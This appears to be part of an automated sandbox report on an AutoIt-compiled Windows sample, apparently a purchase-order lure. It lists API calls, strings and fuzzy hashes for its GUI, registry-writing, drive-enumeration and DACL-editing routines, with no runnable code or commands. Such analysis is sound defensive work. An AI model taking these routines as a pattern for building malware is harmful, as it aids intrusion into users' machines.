                                      • GetClientRect.USER32(00000000,?), ref: 00512D04
                                      • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00512D40
                                      • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00512D62
                                      • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00512D75
                                      • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00512D80
                                      • GlobalLock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00512D89
                                      • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00512D98
                                      • GlobalUnlock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00512DA1
                                      • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00512DA8
                                      • GlobalFree.KERNEL32(00000000), ref: 00512DB3
                                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00512DC5
                                      • OleLoadPicture.OLEAUT32(?,00000000,00000000,0052FC38,00000000), ref: 00512DDB
                                      • GlobalFree.KERNEL32(00000000), ref: 00512DEB
                                      • CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 00512E11
                                      • SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 00512E30
                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00512E52
                                      • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0051303F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Similarity
                                      • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                      • String ID: $AutoIt v3$DISPLAY$static
                                      • API String ID: 2211948467-2373415609
                                      • Opcode ID: 2c8d28a03a0fe583c3007bb4b13f690ee6cf9a3284b8752162bf626aa85ca030
                                      • Instruction ID: 522d12a3a514ec4a5bc3c9b577e65c07f2b4eba0f7802d04011bbf63ac0d809e
                                      • Opcode Fuzzy Hash: 2c8d28a03a0fe583c3007bb4b13f690ee6cf9a3284b8752162bf626aa85ca030
                                      • Instruction Fuzzy Hash: 2A026971A00204AFDB14DF68CC89EAE7FB9FF49314F048518F915AB2A1CB74AD45DBA0
                                      APIs
                                      • SetTextColor.GDI32(?,00000000), ref: 0052712F
                                      • GetSysColorBrush.USER32(0000000F), ref: 00527160
                                      • GetSysColor.USER32(0000000F), ref: 0052716C
                                      • SetBkColor.GDI32(?,000000FF), ref: 00527186
                                      • SelectObject.GDI32(?,?), ref: 00527195
                                      • InflateRect.USER32(?,000000FF,000000FF), ref: 005271C0
                                      • GetSysColor.USER32(00000010), ref: 005271C8
                                      • CreateSolidBrush.GDI32(00000000), ref: 005271CF
                                      • FrameRect.USER32(?,?,00000000), ref: 005271DE
                                      • DeleteObject.GDI32(00000000), ref: 005271E5
                                      • InflateRect.USER32(?,000000FE,000000FE), ref: 00527230
                                      • FillRect.USER32(?,?,?), ref: 00527262
                                      • GetWindowLongW.USER32(?,000000F0), ref: 00527284
                                        • Part of subcall function 005273E8: GetSysColor.USER32(00000012), ref: 00527421
                                        • Part of subcall function 005273E8: SetTextColor.GDI32(?,?), ref: 00527425
                                        • Part of subcall function 005273E8: GetSysColorBrush.USER32(0000000F), ref: 0052743B
                                        • Part of subcall function 005273E8: GetSysColor.USER32(0000000F), ref: 00527446
                                        • Part of subcall function 005273E8: GetSysColor.USER32(00000011), ref: 00527463
                                        • Part of subcall function 005273E8: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00527471
                                        • Part of subcall function 005273E8: SelectObject.GDI32(?,00000000), ref: 00527482
                                        • Part of subcall function 005273E8: SetBkColor.GDI32(?,00000000), ref: 0052748B
                                        • Part of subcall function 005273E8: SelectObject.GDI32(?,?), ref: 00527498
                                        • Part of subcall function 005273E8: InflateRect.USER32(?,000000FF,000000FF), ref: 005274B7
                                        • Part of subcall function 005273E8: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 005274CE
                                        • Part of subcall function 005273E8: GetWindowLongW.USER32(00000000,000000F0), ref: 005274DB
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Similarity
                                      • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                      • String ID:
                                      • API String ID: 4124339563-0
                                      • Opcode ID: f6a62b28b8191d3a9069908470ca4823555b4e54de2660283d2d80884f47af2e
                                      • Instruction ID: 0f9884b5245adf6d70d12f3cc6b36259ee7c781490d6db54b3489bef53414101
                                      • Opcode Fuzzy Hash: f6a62b28b8191d3a9069908470ca4823555b4e54de2660283d2d80884f47af2e
                                      • Instruction Fuzzy Hash: E7A1AF72108315AFD720DF60DC48A6F7FA9FF5A320F100A19F962961E2D770E949DB92
                                      APIs
                                      • DestroyWindow.USER32(00000000), ref: 0051273E
                                      • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0051286A
                                      • SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 005128A9
                                      • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 005128B9
                                      • CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 00512900
                                      • GetClientRect.USER32(00000000,?), ref: 0051290C
                                      • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 00512955
                                      • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00512964
                                      • GetStockObject.GDI32(00000011), ref: 00512974
                                      • SelectObject.GDI32(00000000,00000000), ref: 00512978
                                      • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 00512988
                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00512991
                                      • DeleteDC.GDI32(00000000), ref: 0051299A
                                      • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 005129C6
                                      • SendMessageW.USER32(00000030,00000000,00000001), ref: 005129DD
                                      • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 00512A1D
                                      • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00512A31
                                      • SendMessageW.USER32(00000404,00000001,00000000), ref: 00512A42
                                      • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 00512A77
                                      • GetStockObject.GDI32(00000011), ref: 00512A82
                                      • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00512A8D
                                      • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 00512A97
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                      • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                      • API String ID: 2910397461-517079104
                                      APIs
                                      • SetErrorMode.KERNEL32(00000001), ref: 00504AED
                                      • GetDriveTypeW.KERNEL32(?,0052CB68,?,\\.\,0052CC08), ref: 00504BCA
                                      • SetErrorMode.KERNEL32(00000000,0052CB68,?,\\.\,0052CC08), ref: 00504D36
                                      Strings
                                      Similarity
                                      • API ID: ErrorMode$DriveType
                                      • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                      • API String ID: 2907320926-4222207086
                                      APIs
                                      • GetSysColor.USER32(00000012), ref: 00527421
                                      • SetTextColor.GDI32(?,?), ref: 00527425
                                      • GetSysColorBrush.USER32(0000000F), ref: 0052743B
                                      • GetSysColor.USER32(0000000F), ref: 00527446
                                      • CreateSolidBrush.GDI32(?), ref: 0052744B
                                      • GetSysColor.USER32(00000011), ref: 00527463
                                      • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00527471
                                      • SelectObject.GDI32(?,00000000), ref: 00527482
                                      • SetBkColor.GDI32(?,00000000), ref: 0052748B
                                      • SelectObject.GDI32(?,?), ref: 00527498
                                      • InflateRect.USER32(?,000000FF,000000FF), ref: 005274B7
                                      • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 005274CE
                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 005274DB
                                      • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0052752A
                                      • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00527554
                                      • InflateRect.USER32(?,000000FD,000000FD), ref: 00527572
                                      • DrawFocusRect.USER32(?,?), ref: 0052757D
                                      • GetSysColor.USER32(00000011), ref: 0052758E
                                      • SetTextColor.GDI32(?,00000000), ref: 00527596
                                      • DrawTextW.USER32(?,005270F5,000000FF,?,00000000), ref: 005275A8
                                      • SelectObject.GDI32(?,?), ref: 005275BF
                                      • DeleteObject.GDI32(?), ref: 005275CA
                                      • SelectObject.GDI32(?,?), ref: 005275D0
                                      • DeleteObject.GDI32(?), ref: 005275D5
                                      • SetTextColor.GDI32(?,?), ref: 005275DB
                                      • SetBkColor.GDI32(?,?), ref: 005275E5
                                      Similarity
                                      • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                      • String ID:
                                      • API String ID: 1996641542-0
                                      APIs
                                      • GetCursorPos.USER32(?), ref: 00521128
                                      • GetDesktopWindow.USER32 ref: 0052113D
                                      • GetWindowRect.USER32(00000000), ref: 00521144
                                      • GetWindowLongW.USER32(?,000000F0), ref: 00521199
                                      • DestroyWindow.USER32(?), ref: 005211B9
                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 005211ED
                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0052120B
                                      • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0052121D
                                      • SendMessageW.USER32(00000000,00000421,?,?), ref: 00521232
                                      • SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 00521245
                                      • IsWindowVisible.USER32(00000000), ref: 005212A1
                                      • SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 005212BC
                                      • SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 005212D0
                                      • GetWindowRect.USER32(00000000,?), ref: 005212E8
                                      • MonitorFromPoint.USER32(?,?,00000002), ref: 0052130E
                                      • GetMonitorInfoW.USER32(00000000,?), ref: 00521328
                                      • CopyRect.USER32(?,?), ref: 0052133F
                                      • SendMessageW.USER32(00000000,00000412,00000000), ref: 005213AA
                                      Strings
                                      Similarity
                                      • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                      • String ID: ($0$tooltips_class32
                                      • API String ID: 698492251-4156429822
                                      APIs
                                      • CharUpperBuffW.USER32(?,?), ref: 005202E5
                                      • _wcslen.LIBCMT ref: 0052031F
                                      • _wcslen.LIBCMT ref: 00520389
                                      • _wcslen.LIBCMT ref: 005203F1
                                      • _wcslen.LIBCMT ref: 00520475
                                      • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 005204C5
                                      • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00520504
                                        • Part of subcall function 004AF9F2: _wcslen.LIBCMT ref: 004AF9FD
                                        • Part of subcall function 004F223F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004F2258
                                        • Part of subcall function 004F223F: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 004F228A
                                      Strings
                                      Similarity
                                      • API ID: _wcslen$MessageSend$BuffCharUpper
                                      • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                      • API String ID: 1103490817-719923060
                                      APIs
                                      • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 004A8968
                                      • GetSystemMetrics.USER32(00000007), ref: 004A8970
                                      • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 004A899B
                                      • GetSystemMetrics.USER32(00000008), ref: 004A89A3
                                      • GetSystemMetrics.USER32(00000004), ref: 004A89C8
                                      • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 004A89E5
                                      • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 004A89F5
                                      • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 004A8A28
                                      • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 004A8A3C
                                      • GetClientRect.USER32(00000000,000000FF), ref: 004A8A5A
                                      • GetStockObject.GDI32(00000011), ref: 004A8A76
                                      • SendMessageW.USER32(00000000,00000030,00000000), ref: 004A8A81
                                        • Part of subcall function 004A912D: GetCursorPos.USER32(?), ref: 004A9141
                                        • Part of subcall function 004A912D: ScreenToClient.USER32(00000000,?), ref: 004A915E
                                        • Part of subcall function 004A912D: GetAsyncKeyState.USER32(00000001), ref: 004A9183
                                        • Part of subcall function 004A912D: GetAsyncKeyState.USER32(00000002), ref: 004A919D
                                      • SetTimer.USER32(00000000,00000000,00000028,004A90FC), ref: 004A8AA8
                                      Strings
                                      Similarity
                                      • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                      • String ID: AutoIt v3 GUI
                                      • API String ID: 1458621304-248962490
                                      APIs
                                        • Part of subcall function 004F10F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 004F1114
                                        • Part of subcall function 004F10F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,004F0B9B,?,?,?), ref: 004F1120
                                        • Part of subcall function 004F10F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,004F0B9B,?,?,?), ref: 004F112F
                                        • Part of subcall function 004F10F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,004F0B9B,?,?,?), ref: 004F1136
                                        • Part of subcall function 004F10F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 004F114D
                                      • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 004F0DF5
                                      • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 004F0E29
                                      • GetLengthSid.ADVAPI32(?), ref: 004F0E40
                                      • GetAce.ADVAPI32(?,00000000,?), ref: 004F0E7A
                                      • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 004F0E96
                                      • GetLengthSid.ADVAPI32(?), ref: 004F0EAD
                                      • GetProcessHeap.KERNEL32(00000008,00000008), ref: 004F0EB5
                                      • HeapAlloc.KERNEL32(00000000), ref: 004F0EBC
                                      • GetLengthSid.ADVAPI32(?,00000008,?), ref: 004F0EDD
                                      • CopySid.ADVAPI32(00000000), ref: 004F0EE4
                                      • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 004F0F13
                                      • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 004F0F35
                                      • SetUserObjectSecurity.USER32(?,00000004,?), ref: 004F0F47
                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 004F0F6E
                                      • HeapFree.KERNEL32(00000000), ref: 004F0F75
                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 004F0F7E
                                      • HeapFree.KERNEL32(00000000), ref: 004F0F85
                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 004F0F8E
                                      • HeapFree.KERNEL32(00000000), ref: 004F0F95
                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 004F0FA1
                                      • HeapFree.KERNEL32(00000000), ref: 004F0FA8
                                        • Part of subcall function 004F1193: GetProcessHeap.KERNEL32(00000008,004F0BB1,?,00000000,?,004F0BB1,?), ref: 004F11A1
                                        • Part of subcall function 004F1193: HeapAlloc.KERNEL32(00000000,?,00000000,?,004F0BB1,?), ref: 004F11A8
                                        • Part of subcall function 004F1193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,004F0BB1,?), ref: 004F11B7
                                      Similarity
                                      • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                      • String ID:
                                      • API String ID: 4175595110-0
                                      APIs
                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0051C4BD
                                      • RegCreateKeyExW.ADVAPI32(?,?,00000000,0052CC08,00000000,?,00000000,?,?), ref: 0051C544
                                      • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 0051C5A4
                                      • _wcslen.LIBCMT ref: 0051C5F4
                                      • _wcslen.LIBCMT ref: 0051C66F
                                      • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 0051C6B2
                                      • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 0051C7C1
                                      • RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 0051C84D
                                      • RegCloseKey.ADVAPI32(?), ref: 0051C881
                                      • RegCloseKey.ADVAPI32(00000000), ref: 0051C88E
                                      • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 0051C960
                                      Strings
                                      Similarity
                                      • API ID: Value$Close$_wcslen$ConnectCreateRegistry
                                      • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                      • API String ID: 9721498-966354055
                                      APIs
                                      • CharUpperBuffW.USER32(?,?), ref: 005209C6
                                      • _wcslen.LIBCMT ref: 00520A01
                                      • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00520A54
                                      • _wcslen.LIBCMT ref: 00520A8A
                                      • _wcslen.LIBCMT ref: 00520B06
                                      • _wcslen.LIBCMT ref: 00520B81
                                        • Part of subcall function 004AF9F2: _wcslen.LIBCMT ref: 004AF9FD
                                        • Part of subcall function 004F2BE8: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 004F2BFA
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Similarity
                                      • API ID: _wcslen$MessageSend$BuffCharUpper
                                      • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                      • API String ID: 1103490817-4258414348
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Similarity
                                      • API ID: _wcslen$BuffCharUpper
                                      • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                      • API String ID: 1256254125-909552448
                                      APIs
                                      • _wcslen.LIBCMT ref: 0052835A
                                      • _wcslen.LIBCMT ref: 0052836E
                                      • _wcslen.LIBCMT ref: 00528391
                                      • _wcslen.LIBCMT ref: 005283B4
                                      • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 005283F2
                                      • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00525BF2), ref: 0052844E
                                      • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00528487
                                      • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 005284CA
                                      • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00528501
                                      • FreeLibrary.KERNEL32(?), ref: 0052850D
                                      • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0052851D
                                      • DestroyIcon.USER32(?,?,?,?,?,00525BF2), ref: 0052852C
                                      • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00528549
                                      • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00528555
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Similarity
                                      • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
                                      • String ID: .dll$.exe$.icl
                                      • API String ID: 799131459-1154884017
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Similarity
                                      • API ID:
                                      • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                      • API String ID: 0-1645009161
                                      APIs
                                      • LoadIconW.USER32(00000063), ref: 004F5A2E
                                      • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 004F5A40
                                      • SetWindowTextW.USER32(?,?), ref: 004F5A57
                                      • GetDlgItem.USER32(?,000003EA), ref: 004F5A6C
                                      • SetWindowTextW.USER32(00000000,?), ref: 004F5A72
                                      • GetDlgItem.USER32(?,000003E9), ref: 004F5A82
                                      • SetWindowTextW.USER32(00000000,?), ref: 004F5A88
                                      • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 004F5AA9
                                      • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 004F5AC3
                                      • GetWindowRect.USER32(?,?), ref: 004F5ACC
                                      • _wcslen.LIBCMT ref: 004F5B33
                                      • SetWindowTextW.USER32(?,?), ref: 004F5B6F
                                      • GetDesktopWindow.USER32 ref: 004F5B75
                                      • GetWindowRect.USER32(00000000), ref: 004F5B7C
                                      • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 004F5BD3
                                      • GetClientRect.USER32(?,?), ref: 004F5BE0
                                      • PostMessageW.USER32(?,00000005,00000000,?), ref: 004F5C05
                                      • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 004F5C2F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Similarity
                                      • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                                      • String ID:
                                      • API String ID: 895679908-0
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Similarity
                                      • API ID: _wcslen
                                      • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT$[U
                                      • API String ID: 176396367-4215271941
                                      APIs
                                      • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 004B00C6
                                        • Part of subcall function 004B00ED: InitializeCriticalSectionAndSpinCount.KERNEL32(0056070C,00000FA0,A69424E5,?,?,?,?,004D23B3,000000FF), ref: 004B011C
                                        • Part of subcall function 004B00ED: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,004D23B3,000000FF), ref: 004B0127
                                        • Part of subcall function 004B00ED: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,004D23B3,000000FF), ref: 004B0138
                                        • Part of subcall function 004B00ED: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 004B014E
                                        • Part of subcall function 004B00ED: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 004B015C
                                        • Part of subcall function 004B00ED: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 004B016A
                                        • Part of subcall function 004B00ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 004B0195
                                        • Part of subcall function 004B00ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 004B01A0
                                      • ___scrt_fastfail.LIBCMT ref: 004B00E7
                                        • Part of subcall function 004B00A3: __onexit.LIBCMT ref: 004B00A9
                                      Strings
                                      • WakeAllConditionVariable, xrefs: 004B0162
                                      • api-ms-win-core-synch-l1-2-0.dll, xrefs: 004B0122
                                      • InitializeConditionVariable, xrefs: 004B0148
                                      • SleepConditionVariableCS, xrefs: 004B0154
                                      • kernel32.dll, xrefs: 004B0133
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Similarity
                                      • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                                      • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                      • API String ID: 66158676-1714406822
                                      APIs
                                      • CharLowerBuffW.USER32(00000000,00000000,0052CC08), ref: 00504527
                                      • _wcslen.LIBCMT ref: 0050453B
                                      • _wcslen.LIBCMT ref: 00504599
                                      • _wcslen.LIBCMT ref: 005045F4
                                      • _wcslen.LIBCMT ref: 0050463F
                                      • _wcslen.LIBCMT ref: 005046A7
                                        • Part of subcall function 004AF9F2: _wcslen.LIBCMT ref: 004AF9FD
                                      • GetDriveTypeW.KERNEL32(?,00556BF0,00000061), ref: 00504743
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Similarity
                                      • API ID: _wcslen$BuffCharDriveLowerType
                                      • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                      • API String ID: 2055661098-1000479233
                                      APIs
                                        • Part of subcall function 004A9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 004A9BB2
                                      • DragQueryPoint.SHELL32(?,?), ref: 00529147
                                        • Part of subcall function 00527674: ClientToScreen.USER32(?,?), ref: 0052769A
                                        • Part of subcall function 00527674: GetWindowRect.USER32(?,?), ref: 00527710
                                        • Part of subcall function 00527674: PtInRect.USER32(?,?,00528B89), ref: 00527720
                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 005291B0
                                      • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 005291BB
                                      • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 005291DE
                                      • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00529225
                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 0052923E
                                      • SendMessageW.USER32(?,000000B1,?,?), ref: 00529255
                                      • SendMessageW.USER32(?,000000B1,?,?), ref: 00529277
                                      • DragFinish.SHELL32(?), ref: 0052927E
                                      • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00529371
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Similarity
                                      • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
                                      • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$p#V
                                      • API String ID: 221274066-4064401564
                                      APIs
                                      • _wcslen.LIBCMT ref: 0051B198
                                      • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0051B1B0
                                      • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0051B1D4
                                      • _wcslen.LIBCMT ref: 0051B200
